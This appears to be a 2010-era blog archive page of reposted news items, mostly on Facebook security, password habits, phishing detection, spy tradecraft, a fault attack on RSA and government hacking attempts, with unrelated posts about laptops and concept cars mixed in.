http://www.pcpro.co.uk/news/security/360865/facebook-adds-hacker-tracker-tool

Facebook says it has improved its security with a remote log-in management tool that should help users tell if their accounts have been hacked.

The primary use for the new tool, currently being rolled out and available via the Account Security section of Account Settings, will be as a remote log-out facility for people that have forgotten to sign off when they have been using a public or friend’s computer.

However, Facebook said the tool would also be useful in monitoring accounts if they had been hacked and give users the option to kick the hackers out of their accounts and change the password.

“If someone accesses your account without your permission, you can shut down the unauthorised login before resetting your password and taking other steps to secure your account and computer,” the company said on the Facebook blog.

Within the tool, Facebook said, “you’ll see all of your active sessions along with information about each one. That information includes the log-in time, device name if you’ve previously named it through our log-in notifications feature, the approximate location of the log in based on IP address, and browser and operating system.”

Critics have claimed the new tool will only be used by the technically savvy, leaving the majority of users no better off.

Some of the details are beginning to emerge about the 10 Russian spies that were captured in the US. According to an article on The Register, the spies communicated with Ad-Hoc Wi-Fi networks and hid messages in pictures using Steganography.

FBI agents monitored 28 year old Russian spy Anna Chapman as she communicated with a Russian government official. Anna would go to a book store and using her laptop, created an Ad-Hoc Wi-Fi connection to a Russian contact who was outside the store:

Surveillance agents nearby used “a commercially available tool that can detect the presence of wireless networks” to witness the creation of the ad hoc networks. NetStumbler is probably the most popular example of such software. Law enforcement agents were able to detect a particular MAC address – MAC address A – at the time that Chapman was observed powering on her laptop computer,” the complaint says. Law enforcement agents were also able to determine that the electronic device associated with MAC address A created the ad hoc network.”

The spies also embedded secret messages in pictures and uploaded them to sites where Russian officials retrieved them, and decoded the messages.

A New Jersey search uncovered a network of websites, from which the alleged spies had downloaded images. “These images appear wholly unremarkable to the naked eye,” the complaint explains. “But these images (and others) have been analyzed using the steganography program. As a result of this analysis, some of the images have been revealed as containing readable text files.”

It is interesting to see the tactics used by modern spies. Of course Russia is denying any and all involvement. Kudos to the FBI for taking them down.

Today I will show you 10 things you should stop doing on Facebook in order to take back your security and close the open door.

-Stop posting your phone numbers. Last week I explored a Facebook attack that harvests the phonebook feature. Remember that your number is exposed to your friends, and therefore you’re relying on their security practices as well as your own to protect you. If a phisher can spoof your number, they have an extra layer of authenticity in convincing your friends you are in trouble and need money fast.

-Put down the games. I know the Mafia can’t take Cuba without you, but it’s time to stop. The top games on Facebook have been hacked, and it’s just a matter of time before the one you play is next. It’s arguable that the damage is already done with the games and applications you’ve already allowed, but don’t sign up for any new ones! Third party apps are not guaranteed to be secure, and you should not trust them with your credentials.

-Don’t trust chat. It shouldn’t take Chris Hansen to tell everyone that the person on the other end of your chat session could be anyone. The chat feature on Facebook should be treated as a public conversation. Never give out any private information, even if you’re positive you are talking to your friend.

-Refresh your personal info. Take a fresh look at your profile from the perspective of a social engineer. Does your profile tell a story about you? What information can you cut out? Many security questions ask about personal details about primary school and pets. Delete any photos or profile details that may relate to those kinds of questions.

-Don’t use the lazy emails. Facebook will fill your email inbox with notifications, and the links to easily respond. Instead of following the links in email, open up a fresh tab and go to facebook.com directly. Facebook and most social networks are targets for email spoofing. Otherwise you’ll be entering your login password at facebock.com!

-Don’t friend acquaintances. Think of the friends list as a circle of trust. If you don’t know the person well enough to trust their
security savvy, than you’re very unlikely to recognize the behavior of a phisher pretending to be them. 500 friends means 500 possible inroads to a social engineering or phishing attack. Tone down the number.

-Don’t keep an old password! Changing your password short circuits many trivial forms of attack. Facebook is a high risk target for Identity Theft, especially if you’re using applications frequently. How about doing it now!

-Photos are forever. Make it clear to your friends and family that you do not want those pictures of you in your birthday suit on anyone’s profile. (As opposed to the one of you in a suit on your birthday!) Pictures give behavioral information to an attacker. Bruce Schneier calls this “incidental data” in his Taxonomy of Social Networking Data. There he makes the assumption that incidental data is information that you did not create about yourself, and therefore do not control. I would add that although much of it is outside your control, there are ways to influence your friend’s posting behavior overall. Also, Facebook gives users the ability to “untag” themselves in pictures. While the damage is already done in the short term, you’ve influenced long term vulnerability.

-Don’t forget @mentions. This new feature brings more incidental data. Be respectful of your neighbor’s privacy. Ask yourself if having a friend’s entire profile pinned to your comment like a big arrow is actually necessary for the joke to be funny.

-Don’t trust other websites. Facebook is everywhere now. The same trust rules apply to the Facebook Login feature that is spreading to other websites. If you don’t trust the website you’re on, then signing in with the Facebook credential does not give you an added layer of protection, but rather hands your password to strangers.

This list may seem counterproductive to the efforts Facebook makes to create a global connected community. While I am interested in being a part of such a community, I go into it with eyes open. Just like wearing a wallet belt when I go to huge tourist destinations, I want to be smart about visiting the hugely popular social networking sites online. It may not be the coolest thing to do, but in the end I found that my friends didn’t even notice I had taken these safety precautions. Now the camera bag I stuffed in my shirt… that was a different matter.

Original source:
http://erratasec.blogspot.com/2009/11/10-facebook-donts.html

Whenever there’s a new post about cleaning, maintenance, or tune-up apps on Download Squad, it seems like there’s always at least one commenter who proclaims their affinity for Advanced SystemCare. And with good reason: SystemCare does a good job of cleaning up temp files and browsing traces (including Flash cookies), tuning the Windows registry, and it can even clean up some basic spyware.

Advanced SystemCare does other neat things too: it bundles other useful little apps to handle other tasks like driver backup, drive space analysis, uninstalling programs, finding duplicate files, editing your context menu, managing startup items, fixing broken shortcuts, and optimizing and freeing RAM.

The pro version offers a few other improvements, like automated maintenance, deeper registry scanning, and smart disk defrag.

Better still, IObit is giving away Advanced SystemCare 3 Pro for (about) 360 hours to celebrate the program’s 5th birthday! All you have to do is visit the giveaway page, tick a radio button, and agree to the terms. You won’t be eligible for tech support, but that’s not really a major downside.

Two quick notes: the verification code is case-sensitive, and the installer will open two IObit web pages when complete. Other than that, the process is annoyance-free.

[via Softpedia]

The pricing method is based on the number of contacts per compromised account, presumably with the idea to allow easier spreading of related malicious content across Facebook.

Here’s an excerpt from the report, and a brief FAQ on the underground ad.

• “On Feb. 10, 2010, (cybercriminal) stated that he or she is selling 1.5 million compromised Facebook accounts, in bulk quantities, belonging to users in various countries. The price per 1,000 accounts varies based upon the number of friends and contacts that each account possesses. For a purchase of compromised accounts containing 10 contacts or fewer, a buyer must pay $25 per 1,000 accounts. A purchase of compromised accounts containing 10 or more contacts requires a buyer to pay $45 per 1,000 accounts. Accounts containing zero contacts are also available for bulk purchasing from (cybercriminal), at the cost of $15 per 1,000 accounts. The prices of these accounts are presumably in USD or the equivalent amount in some form of electronic currency.”

Sometimes, there’s no honor among cybercriminals (Phishers increasingly scamming other phishers), just like there isn’t among “real life” thieves.

From the distribution of backdoored web interfaces to web malware exploitation kits, to the actual “binding” of additional malware to the original release, sophisticated or at least cybercriminals with experience, have realized that there are thousands of potential cybercriminals that could unknowingly start working for them. The process of “cybercriminals attempting to scam novice cybercriminals” demonstrates just how vibrant the ecosystem has become these days.

With a huge percentage of the underground marketplace driven by reputation, this is exactly what this particular seller of Facebook data is missing. Moreover, with quality assurance now an inseparable part of the cybercrime ecosystem, the seller is not just skipping the time frame in between which the accounts were compromised, he is also not mentioning have many of them are actually verified as working.

These, and several other factors make me skeptical on the quality of this underground proposition.

If we consider that the cybercriminal’s claims to be true, how did he manage to obtain 1.5 million Facebook accounts?

The ad is clearly stating that they are accounts with contacts, meaning they’re compromised, and other which have zero contacts, meaning they’ve been automatically generated by outsourcing the CAPTCHA-solving process to international teams specializing in the process.

The compromised accounts could have been obtained through the emerging Cybercrime-as-a-Service (CaaS) market model. For instance, if he has paid $100 for 3GB of raw crimeware data, and the data mining allowed him to compile a list of 1.5m Facebook accounts, based on the current price, he’ll automatically break-even.

Phishing campaigns shouldn’t be excluded as a possibility, however, it remains unclear whether the seller has launched them personally, or managed to purchase the raw data from someone else.

What kind of a business model within the cybercrime ecosystem would allow him to sell the data so cheaply, and still make a profit?

It’s a business model with an ever-decreasing cost of supply, based on the currently active “malicious economies of scale” phrase. This efficiency-driven cybercrime model is in fact so successful, that whether consciously or subconsciously, cybercriminals are realizing the basics of market liquidity, and the time value of “underground goods”, in particular the decreasing future value of assets like the Facebook accounts — the value becomes zero when the affected user changes his password from a malware-free host.

Why would a cybercriminal want access to your Facebook account?

For a variety of fraudulent reasons, all of them exploiting the already established trust relationship between the compromised account’s holder and his network of friends.

From “money transfer schemes” where the fraudster is supposedly stuck somewhere and requires cash, to a malware campaign relying on nothing else but a status message leading to a client-side exploits serving site. Your network of friends, turns into his network for propagation of fraudulent/malicious schemes and campaigns.

VeriSign’s iDefense also makes an interesting observation.

With Facebook’s user base growing to 300 million people across the globe, this indispensable marketing platform can be easily integrated into the cybercriminal’s arsenal, with localized and targeted social engineering attacks relying on basic market segmentation, launched with the idea to achieve a higher conversion rate, compared to mass marketing approaches.

Fact or fiction, based on the ad’s content, this is perhaps the perfect time to change your Facebook password from a malware-free host, since a strong password is just as weak as the weak one in general if there’s malicious code present on the system.

Written By : Dancho Danchev

1. HP Pavilion DV4-1541US

HP Pavilion PCs are known for their excellent performance and credibility as multimedia and entertainment platforms.

Specification

• Processor : Intel Core 2 Duo T6600
• RAM : 4 GB DDR3
• Hard Disk Capacity : 320 GB 7200 rpm
• OS : Windows 7 Premium 64 bit
• Display : 14.1 inch WXGA 1280 X 800 pixels resolution
• Express Card 54 Slot
• Infrared Remote Receiver
• LightScribe DVD Writer

Price

About $650

2. Apple MacBook Pro Summer 2009

Yes! Apples are always good and yummy too! There must be an apple in every top 10 list and this is no exception. Previously known as the MacBook, the old 13-inch aluminum unibody laptop is now called “Pro” laptops. In addition to all-metal construction and GeForce 9400M graphics, the 13-inch Pro regains a FireWire port, and adds an SD slot.

Specification

• Processor : Intel Core 2 Duo 2.26 GHz
• RAM : 2 GB
• Hard Disk Capacity : 160 GB
• Display : 13 inch
• NVIDIA GeForce 9400M Graphics
• Mac OS X v10.6 Snow Leopard Operating System

Price

About $1300

3. Dell Studio 15

Though the Dell Studio 15 is nothing new in 2010 but still it is one of the best laptops available in the market, if you ask me. There are lots of configurations available for this laptop and the prices are also very affordable.

Specification

• Processor : Intel Core 2 Duo T5750 2.0 GHz
• RAM : 2 GB DDR2
• Hard Disk Capacity : 160 GB 5400 RPM
• 8X Slot Load DVD RW Drive
• Display : 15.4 inchLED Display with 1366 X 768 pixels resolution
• Integrated 2.0 MP Webcam
• Windows Vista Home Premium

Price

About $1300

4. Sony Vaio VPCZ116GX/S

There are no doubt about the quality of the Sony VAIO laptops. If you can afford the price, Sony’s top-of-the-line 13-inch Vaio VPCZ116GX/S is recommended. It has a speedy Core i5 CPU, discrete graphics, a huge 256GB SSD, and a sky-high price to match.

Specification

• Processor : Intel Core i5 520 M
• RAM : 4 GB DDR3 1066 MHz
• 256 GB Solid State Drive
• OS : Windows 7 Professional 64 bit
• Display : 13.1 Inch 1600 X 900 pixels

Price

About $2200

5. Acer Aspire Timeline AS5810TZ-4274

If you thought that Acer prodecues only cheap quality laptops, you should at least try this one to see how wrong you are.

Specification

• 1.3 GHz Intel Pentium SU2700 Processor
• 3072MB DDR3 1066MHz RAM
• 320 GB SATA Hard Drive
• 8X DVD-Super Multi Double-Layer Drive
• Windows Vista Home Premium (SP1)
• Over 8 Hours of Battery Life (6-Cell 5600 mAh)
• 15.6? HD CineCrystal LED-backlit Display
• Intel Graphics Media Accelerator 4500MHD

Price

About $620

6.  ASUS UL30A-X5 Thin and Light

Asus may be beter known for their netbook lineup but they also produce some good laptops of other categories also.

Specification

• 1.3GHz Intel SU7300 Core 2 Duo Processor
• 4GB of DDR3 RAM, 2 slots, 4GB Max
• 500GB SATA Hard Drive (5400 RPM)
• 13.3? HD LED LCD Display
• Intel GMA 4500MHD Graphics
• Wi-Fi 802.11 bgn
• 0.3MP Webcam
• Windows 7 Home Premium Operating System (64 bit)

Price

About $680

7. Toshiba Satellite L505-S5993

Toshiba Satellite L505-S5993 is a slim, fast, and affordable package for mainstream users.

Specification

• 2.1GHz Intel Pentium T4300 Processor
• 4GB Memory
• 500GB Serial ATA Hard Drive, DVD SuperMulti Drive
• 15.6? High-def Display
• Windows 7 Home Premium 64-bit, 2 Hours 25 Minutes of Battery Life

Price

About $550

8. Dell Inspiron 14

Dell Inspiron Series are known for the best price to performance ratio.

Specification

• Processor : Intel Dual Core T4400
• RAM : 2 GB
• Hard Disk Capacity : 160 GB
• 14.0 High Definition (720p) LED Display with TrueLife

Price

About $500

9. HP Mini 5102

HP’s sturdy and stylish Mini 5102 is a slight upgrade to one of our favorite Netbooks, but we had hoped for a little more fresh thinking for 2010.

Specification

• Processor : Intel® Atom™ Processor N450 (1.66 GHz, 512 KB L2 cache, 667 MHz FSB)
• RAM : 2GB
• 160 GB HDD
• OS : Windows 7 Starter

Price

About $650

10. HP Compaq 6730b

Another very good contender from the house of HP.

• Processor : Intel Core 2 Duo P8600
• RAM : 2 GB
• Hard Disk Capacity : 320 GB
• OS : Windows 7 Pro
• Display : 1380 X 800 pixels resolution
• Video / Graphics : Intel GMA 4500 MHD with Maximum of 3 GB Video RAM
• Battery Life : 6 hour
• Weight : 5.1 Lbs
• CD / DVD Burner
• 1 Year Warranty
• VGA  Webcam
• 7-in-1 Card Reader

Price

About $900

Alfa Romeo Pandion concept marks Berton’s sizzling come back to Geneva Motor Show 2010 after two years. The futuristic car is a facelift to typical Alfa Romeo family undisputed for its iconic car designs. Pandion is the first design by Mike Robinson in his new role as Design and Brand Director at Bertone. Inspired by the sea hawk known for its long wings, the Berton car owes its name to the creature. The Pandion will be a extreme and controversial sports car with high-flown features. The dream car is a perfect blend of ‘Skin and Frame’, drawing a distinct balance between technology and craftsmanship.

Alfa Romeo Pandion is a prototype of 2+2 coupe, Maserati GranTurismo powered by 4.7 litre, 450 CV 8-cylinder Alfa Romeo engine. With the sleekest look, Bertone’s concept car measures 4620 mm in length, 1971 mm wide, 1230 mm high, and flaunts about a 2850 mm wheelbase. Pandion bears an external dimension of compact sports car taking over the classic Alfa grille. The rear-end made up of hundreds of blades, seems to wrap up. Interiors of the Pandion offer a large sports car feeling.

2. Lamborghini Estoque Concept

Lamborghini Estoque concept unleashes the true DNA of Lamborghini offering unmatched versatility. Starting from the long wheelbase, the broad track, the mighty, the low profile, the clean surfaces, accentuated wheels, every aspect breaths the essence of Lamborghini brand.

Estoque features an evolutionary design influenced by Sant’ Agata design ethic – futuristic concept. Estoque is an exclusive sports sedan, first of its kind in the history of Automobili Lamborghini.

The concept of Lamborghini Estoque breeds a possibility for a third model series within the Lamborghini product line-up. A blend of dedicated sports car and a relaxed Gran Turismo, Estoque is a multi-faceted vehicle for multi-faceted lifestyles.

Lamborghini Estoque features an extremely low profile standing at a mere 1.35 meters (4.43 feet) high, but amazingly spacious. The secret lies in the long wheelbase with the rearwards positioning of the front mid-engine, enables a relaxed, sporty seating position. The secret lies in its very long wheelbase which, in spite of the rearwards positioning of the front mid-engine, enables a relaxed, sporty seating position. Entering and exiting is also pleasingly straightforward through the large, wide-opening doors.

Imitating all the recent contemporary Lamborghini models, Estoque features permanent all-wheel drive. With centrally powered engine powering all the four wheels, which makes for superior traction in all driving situations, and providing extra reserves for extremely sporty driving and for challenging weather conditions.

It’s equipped with the highly-acclaimed Lamborghini ten-cylinder from the Gallardo LP 560-4 – offering more torque and higher revving than virtually any other engine. There’s a range of drivelines that are conceivable for Estoque. It’s a contemporary alternative that could turbocharged eight-cylinder derived from the V10.

3. Cadillac CTS Coupe Concept

The CTS Coupe features Cadillac’s much-hyped Art and Science design language. The More expressive, more technical and very personal, the CTS Coupe extends the dramatic design of its sedan predecessor with all-new sculpted bodywork aft of the front fenders.

Among the CTS Coupe Concept’s signature design cues are a number of elements that suggest the look of a carefully cut diamond – particularly at the rear. These elements are seen in everything from the chrome header above the rear license plate holder to the indents that comprise the basic form of the rear fascia.

CTS Coupe extends the acclaimed capabilities of the sedan in terms of performance technology. The concept coupe includes the capability to support a broad engine range of gasoline and diesel. engines.

The CTS coupe ascertains that the sedan’s 3.6L V-6 engines include 304-horsepower Direct Injection power plant. The Coupe concept is also designed for a new 2.9L turbo-diesel that was developed in the international markets. The especially designed engine for CTS, will offer a 250 horsepower and 406 lb-ft torque.

The engine is backed by a six-speed manual transmission that produces a torque to an independent sprung rear axle. The CTS Coupe sport-tuned suspension that offers a slightly lower height than the production CTS. The look is further enhanced with rakish shape and large, 20-inch front and 21-inch rear wheels.

Behind the chrome, split-spoke aluminum alloy wheels is a set of high-performance brakes, with cross-drilled rotors. The CTS Coupe users have the elements along with other nods to classic Cadillac cues. It’s a forward looking design in every sense of the term.

4. BMW ActiveE concept

After 6 months of Mini E field test program, BMW finally stepped to the phase two of its electric vehicle development introducing its Concept ActiveE that brings electric drive to the Roundel.
ActiveE retains 1’s full four-seat configuration of the 1 by packaging a battery specifically designed for automotive applications.

The BMW ActiveE concept is totally electric. Build on the lines of Mini E electric car, the ActiveE is powered by a rear-mounted electric motor that stumps up 170 horsepower and 184 pound-feet of torque. It might be decent enough to lug the notoriously overweight 1 Series around town. The BMW can gear up 0-60 in less than nine seconds.

5. Rinspeed iChange Concept

Rinspeed “iChange” concept engineered by Esoro perfectly matches Esoros motto – What you dream is what you get. Rinspeed iChange stands for change, future-orientated technologies and great passion. It’s an extremely flexible vehicle. With little adjustments it can be transformed from streamlined one-seater sports car into a comfortable car with ample room for three.
The electric motor is powered by lithium-ion batteries that are available in two different stack configured for short- and long-distance driving. iChange’s electric motor produces 150kW, capable of propelling the car to a top speed of 220 km/h. The sprint from rest to 100 km/h takes just slightly over four seconds. With a six-speed pre-selector gearbox from the Subaru WRX car, “iChange” offers a blazing performance.

6. Audi RSQ Concept

The futuristic film concept car, Audi RSQ was especially designed for motion pictures. It is believed to be Audi’s most ambitious project ever. Audi RSQ Concept was hyped after it was unveiled in the motion picture „I, ROBOT“, Audi Design developed the spectacular vehicle, which helps leading actor Will Smith – to solve a mystery. It’s basically a mid-engined sports car with its two doors rear-hinged to the C-posts of the body and open according to the butterfly principle.
Audi RSQ Concept is a visionary interpretation of Audi’s typical automobile design. It is an important challenge offered to the designers – despite its extreme character, the car had to be recognised as an Audi. In order to address this demand, the engineers implemented a current Audi front-end design that includes the trapezoidal “Audi Single-Frame Grille”, the company’s trademark overlapping four rings, and the Multi Media Interface (MMI) driver-to-car control system.

7. Chevrolet Corvette Stingray Concept

Chevrolet’s blends the futuristic vision of design and technology to deliver the Corvette Stingray Concept. A version of the concept car featured as a Sideswipe in the Transformers: Revenge of the Fallen. Corvette Stingray Concept exhibits surprisingly high-tech features, modern materials, and an enticingly new appearance. The car is well-appointed with clamshell hood, scissor-style doors, ergonomic seats, rear-view camera with night vision enhancement, and a high performance hybrid drive.

The car is well-appointed with a clamshell hood, scissor-style doors, ergonomic seats, rear-view camera with night vision enhancement, and a high performance hybrid drive. The concept car has interactive touch controls that allow driver to customize the power and efficiency of his or her ride and share it with friends via the in-car camera system and advanced telemetrics.

8. GMC GRANITE CONCEPT

This is the newest coupe concept from GMC showcasing “urban-industrial design aesthetic” The exterior is streamlined to create an intricate intersecting planes and angles with GMC’s signature grille design. The Power for Granite concept is generated from 1.4-liter turbocharged engine, matched with 6-speed transmission. Granite features 4 doors hinged on each side to open like a set of French doors. It has no pillars between the front and rear doors which makes it easy to enter, exit and load with bulky items. Some of the exclusive functional elements included in the Granite concept are reconfigurable seats that can flip up and fold in toward the center console allowing a long, unobstructed storage space. When brought into the market, Granite will be the smallest GMC ever build having a full 2 feet shorter than the new Terrain compact crossover. The open interiors are designed to be spacious and flexible in order to meet the needs of active people.

9. 2009 Cadillac Converj Concept

The Converj sedan conceptualizes GM’s revolutionary electric propulsion technology – Voltec evolved to power a luxury coupe. Touting of a typically elegant Cadillac “no compromises” design, Converj Concept. Cadillac’s electric vehicle will allure the global luxury customers looking for a car with both a strong design and electric propulsion with a total range of hundreds of anxiety-free miles.

Latest in the extended-range of electric vehicle (E-REV) concept from Cadillac, the car features a voguish body style that reflects the brand’s traditional Art and Science design theme. Converj intends to be a Cadillac in substance with its premium materials, technology and driving dynamics, which are hallmark of the brand.

The sedan delivers 273 lb.-ft. (370 Nm) of instant torque, for a quick launch, and 120 kW of power. Cadilla’s top speed is 100 mph. It’s no compromise in vehicle performance in either mode of operation. In order to tout the ride comfort, Converj incorporates a GM’s Magnetic Ride Control and adds even greater efficiency, energy during braking and stored in the battery.

Features

• New, organic light-emitting diode technology used on reconfigurable instrument cluster * Touch-screen navigation, climate, center-stack controls and audio systems
• Adjustable, overhead white ambient lighting
• Unique power on sequence featuring blue-lit console graphics
• Screen displays for features including regenerative braking, battery charge level and power output
• No inside rearview or outside mirrors; cameras provide surrounding images on a screen placed high on the instrument panel for a full, panoramic view
• Push-button ignition and power-folding front seats General Motors Corp. (NYSE: GM), the world’s largest automaker, has been the annual global industry sales leader for 77 years.

10. HYUNDAI RED BULL GENESIS COUPE

Car-enthusiasts awaiting for upcoming launch of the 2010 Genesis Coupe will now have Hyundai unveiling a new concept teaming with Rhys Millen Racing and Red Bull Energy Drink to campaign the car in the high-energy sport of drift racing. The already light weight Genesis Coupe will be made even lighter by replicating the fenders, front fascia, hood, deck lid, roof, doors, and side skirts out of carbon fiber. The interior show custom-fabricated 8-point safety cage and firewall. The single Sparco racing seat further protects the driver in the overhauled cockpit. The concept coupe is powered by a Hyundai Lambda 3.8-liter V-6 engine, which is equipped with a Turbonetics turbocharger, mated to a HKS sequential transmission. As a result we have a Genesis Coupe that will produce 550 horsepower and 520 lb.-ft. of torque

Source:: http://gadgetophilia.com/top-10-concept-cars-you-never-dreamt-of/

For example, follow these instructions to see a list of people who worked on the User Assistance feature of Microsoft Word 2000:

1. Open Microsoft Word2000

2. Press F1 or click the “Office Assistant” button

3. Under the “What would you like to do?”, type “Cast” (No quotes)

4. Click SEARCH

5. Click the MICROSOFT OFFICE 2000 USER ASSISTANCE STAFF topic

6. Click the graphic in the Microsoft Word Help screen

Easter eggs in computer games are quite common and may be funny scenes, hidden levels, or other extras gamers can discover while playing. One of the most popular easter eggs to unlock in video games is the “Dopefish”. This fun, fictional fish first appeared in Commander Keen: Secret of the Oracle (1991). Since that time it has made an appearance as an easter egg in numerous games. In many games you need to unlock a special level or perform a sequence of actions to find the hidden easter egg.

Easter eggs may also be found in movies, music albums, videos and other types of media.

Apr 03, 2010

http://www.indianexpress.com/news/hacker-held-for-duping-job-aspirants/599464/

The Delhi Police arrested a professional hacker on Friday who led a gang which allegedly duped hundreds of youths by promising them jobs as technicians and airline crew.

Police identified the accused as Amritesh and said they are raiding several places in Delhi to nab his associates.

Amritesh, the police said, had hacked a popular job website — he would find out probable victims and stay in touch with them until they paid money for the promised job.

Police sources said at least 25 students who were cheated by the gang approached the Safdarjung Enclave police on Friday, alleging they have been duped of lakhs of rupees.

Abhinav, a student, said, “Amritesh promised me a job with a popular airline for Rs 80,000. He even gave me joining letters printed on the airlines’ letterheads and affidavits. He also arranged meetings with a person who claimed to be the HR head of the airline. He said I could join work in January.”

Actor, singer, composer, and heartthrob Himesh Reshammiya has bettered Ram Gopal Varma’s 5 lakh rupees Phoonk 2 challenge and has offered 10 lakh rupees to anyone who can take up his Aansuon Ka Dard challenge. Aansuon Ka Dard is the name of the upcoming album of Himesh and it contains 10 brand new songs sung in different styles, with and without nose, by the legendary singer.

Mar 9th 2010

http://www.engadget.com/2010/03/09/1024-bit-rsa-encryption-cracked-by-carefully-starving-cpu-of-ele/

Since 1977, RSA public-key encryption has protected privacy and verified authenticity when using computers, gadgets and web browsers around the globe, with only the most brutish of brute force efforts (and 1,500 years of processing time) felling its 768-bit variety earlier this year. Now, three eggheads (or Wolverines, as it were) at the University of Michigan claim they can break it simply by tweaking a device’s power supply. By fluctuating the voltage to the CPU such that it generated a single hardware error per clock cycle, they found that they could cause the server to flip single bits of the private key at a time, allowing them to slowly piece together the password. With a small cluster of 81 Pentium 4 chips and 104 hours of processing time, they were able to successfully hack 1024-bit encryption in OpenSSL on a SPARC-based system, without damaging the computer, leaving a single trace or ending human life as we know it. That’s why they’re presenting a paper at the Design, Automation and Test conference this week in Europe, and that’s why — until RSA hopefully fixes the flaw — you should keep a close eye on your server room’s power supply.

http://news.webindia123.com/news/articles/Science/20100314/1464200.html

Iran claimed to have busted a spy racket allegedly linked with the US intelligence agency CIA and arrested 30 people for operating an internet network to gather secret data related to Iran’s nuclear scientists.

The Judiciary said Saturday it has dismantled a US-backed cyber network, which was set up to gather information on Iran’s nuclear scientists and spread unrest after the presidential election.

The nexus was formed by anti-Iran groups, including the terrorist Mojahedin Khalq Organisation (MKO), the Judiciary said in a statement, adding that 30 suspects have been arrested.

According to Iranian authority, during former US President George W Bush’s regime, a new campaign in the intelligence front – the “cyber war” – was set up to engage Iran, with the help of the MKO, pro-monarchy groups and other anti-Iran cells.

“Iran proxy”, which was one of the main projects of the campaign, received $50 million from the CIA and the US State Department, the statement said.

The program, which allowed Iranians bypass the state’s filtering system and access the internet, was designed to “obtain personal and family information” of its users and pass them on to US spy agencies.

Another major project was a network of “human rights activists”, which was led by Keyvan Rafiei, Jamal Hosseini and Ahmad Batebi, it said.

The network was tasked with recruiting people and sending them to an MKO camp in Iraq and other countries, where they would receive training, the statement said.

It said the network was also in close cooperation with “Lawyers Committee” and “Harana News service”, Press TV reported.

The network, according to the confession of its arrested members, was also tasked with inviting people to attend rallies and riots after the presidential election in June.

The Judiciary said that the International Criminal Police Organisation (INTERPOL) has been briefed on the situation and about the key members of the group, who operate the racket from the US.

http://www.net-security.org/secworld.php?id=9096&utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+HelpNetSecurity+%28Help+Net+Security%29

Google analyzes millions of pages per day when searching for phishing behavior. This kind of activity is, of course, not done by people but by computers.

The computers are programmed to look for certain things that will identify the page as a phishing site. Those things are actually the same things that users should check when evaluating if a page is legitimate or not.

According to a post on Google’s official online security blog, the first step is looking at the URL- Does it contain words like “login” or “banking” or trademarks of the phishing target? Does it use an IP address for its hostname? Does it have a large number of host components, making the address unusually long? If the answer is yes to all of these questions, the page could be a phishing one.

The second step consists of analyzing the page – Does it contain a password field? Does the majority of the links point to the phishing target so that the phishing pages functions as the legitimate one would? Google’s computers check also the terms most often used on the page, and a telling terms like “password” raises a red flag.

The third step consists of a look-up of the hosting information – does the institution claim to be based in one country but the webpage is hosted on servers in another country and on a local ISP’s network? If the answer is yes, chances are high it’s not a legal site.

Lastly, checking to see whether the page is popular and checking the spam reputation of the domain on which the page is hosted will give you another clue – phishing pages are usually hosted on domains that have a (bad) reputation when it comes to spam sending.

When all these clues are combined and indicate that the site is likely set up for phishing purposes, it is put on Google’s blacklist that is used by the browsers to warn the users that they have landed on a malicious page.

“False positives” do happen, but they happen once every 10,000 checked pages, and even then it is usually a site set up for some other malicious purpose. The basis on which the classifier is trained to recognize phishing pages is provided by a sample of around ten million analyzed URLs in the last three months and an addition of current features, and it is executed once a day.

Phishers may use a number of techniques to try and bypass this system, but they can’t escape forever. The more people come to their site, the likelihood of someone recognizing it for what it is and reporting it to Google rises, so it’s just a matter of time before it gets flagged.

By John Leyden

30th March 2010

http://www.theregister.co.uk/2010/03/30/password_security_still_pants/

Nearly a quarter of people (23 per cent) polled in a survey by Symantec use their browser to keep tabs on their passwords.

A survey of 400 surfers by Symantec also found that 60 per cent fail to change their passwords regularly. Further violating the ‘passwords should be treated like toothbrushes’ maxim (changed frequently and not shared), the pollsters also found that a quarter of people have given their passwords to their spouse, while one in 10 people have given their password to a ‘friend’.

Password choices were also lamentably bad. Twelve of the respondents admitted they used the phrase ‘password’ as their, err, password while one in ten used a pet’s name. The name of a pet might easily be obtained by browsing on an intended target’s social networking profile.

Eight per cent of the 400 respondents said they used the same password on all their online sites, a shortcoming that means a compromise of one low-sensitivity account hands over access to a victim’s more sensitive webmail and online banking accounts. The survey respondents came from readers of Symantec’s Security Response blog, who might be expected to be more security savvy than the general net population, though the survey shows many of them making the same basic errors that crop up time and again in password security surveys.

Symantec has put together its findings together with a list of suggestions for picking better passwords, a basic but woefully overlooked security precaution, in a blog post at  http://www.symantec.com/connect/pt-br/blogs/password-survey-results.

The net security firm advised computer users to pick a mix of numbers, letters, punctuation, and symbols when picking passwords. This may be derived from taking a memorable phrase and altering it by replacing characters with symbols, for example. Surfers should avoid personal information, repetition and sequences in passwords, Symantec further recommends.

The Hindu

March 2010

http://beta.thehindu.com/business/article193044.ece

There have been attempts to hack into the government computer network, but till date there has been no loss of vital information, says Minister of State for Communication and Information Technology Sachin Pilot.

“Yes, there have been attempts but I can categorically say that not one attempt has been successful,” the minister said. “The government’s computer network system, maintained by the National Informatics Centre, is highly efficient,” Mr. Pilot told IANS in an interview.

Earlier this year, hackers tried to penetrate government computers in vital ministries including the office of the National Security Adviser (NSA). These attacks, officials said, originated in China.

According to the Computer Emergency Response Team, a cyber security advisory and referral agency of the Department of Information Technology, 570 Indian web sites were defaced by hackers during January this year, against 271 during the like month of last year.

During the whole of last year, a total of 6,023 cases of defacement were reported.

The agency also said that during January, out of 246 cyber-security incidents, as 63 percent related to spamming, 18 to phishing, 8 percent to malicious viruses, 76 percent to unauthorised scanning and the rest to other categories.

Former NSA M.K. Narayanan, who is currently West Bengal governor, had stated that his office and other government departments were targeted on the same date that U.S. Defence, Finance and Technology companies, including Google, reported cyber attacks from China.

The hackers had sent an e-mail with a PDF attachment containing a Trojan virus. But the virus, which allows hackers to download or delete files, was detected and officials were told not to log on until it was eliminated.

Mr. Pilot pointed out that such hackers were usually scanning the entire system to find weak spots. “But our people are very efficient and well trained. Safeguards have ensured that national security has not been breached.”

The Ministry of External Affairs and Indian embassies have instituted stringent protocol on the use of e-mails by serving officers, which includes frequently changing passwords and using e-mails only for routine communication.

Besides, the ministry has instituted a periodic security review of all computers to ward off cyber threats.

Reuters

Feb 22, 2010

http://www.reuters.com/article/idUKTRE61L37B20100222

LONDON (Reuters) – The best weapon against the online thieves, spies and vandals who threaten global business and security would be international regulation of cyberspace.

Luckily for them, such cooperation does not yet exist.

